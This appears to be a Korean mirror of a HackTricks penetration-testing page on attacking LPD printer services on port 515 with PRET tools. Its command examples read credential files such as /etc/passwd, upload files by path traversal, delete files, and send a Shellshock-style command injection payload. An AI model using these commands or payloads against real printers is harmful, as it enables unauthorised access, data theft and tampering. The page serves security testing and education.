mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
4.1 KiB
4.1 KiB
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
HackTricks를 지원하는 다른 방법:
- 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @carlospolopm를 팔로우하세요.
- Hacking 트릭을 공유하려면 HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하세요.
LPD 프로토콜 소개
1980년대에는 Line Printer Daemon (LPD) 프로토콜이 Berkeley Unix에서 개발되었으며, 나중에 RFC1179를 통해 공식화되었습니다. 이 프로토콜은 515/tcp 포트를 통해 작동하며, lpr
명령을 통해 상호작용할 수 있습니다. LPD를 통한 인쇄의 핵심은 제어 파일(작업 세부 정보 및 사용자 지정)과 함께 데이터 파일(인쇄 정보를 보유)을 보내는 것입니다. 제어 파일을 통해 데이터 파일에 대한 다양한 파일 형식을 선택할 수 있지만, 이러한 파일의 처리는 특정 LPD 구현에 따라 결정됩니다. Unix와 유사한 시스템에서 널리 인정받는 구현체는 LPRng입니다. 특히, LPD 프로토콜은 악성 PostScript 또는 PJL 인쇄 작업을 실행하기 위해 악용될 수 있습니다.
LPD 프린터와 상호작용하기 위한 도구
PRET는 LPD 호환 프린터와 상호작용하기 위한 두 가지 필수 도구인 lpdprint
와 lpdtest
를 소개합니다. 이 도구들은 데이터를 인쇄하거나 프린터 상의 파일을 조작하는 다양한 작업을 가능하게 합니다. 파일의 다운로드, 업로드, 삭제 등이 가능합니다:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
프린터 해킹을 더 탐구하고 싶은 개인들을 위한 포괄적인 자료는 Hacking Printers에서 찾을 수 있습니다.
Shodan
포트 515
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
HackTricks를 지원하는 다른 방법:
- 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- 독점적인 NFTs인 The PEASS Family를 발견하세요.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @carlospolopm를 팔로우하세요.
- HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.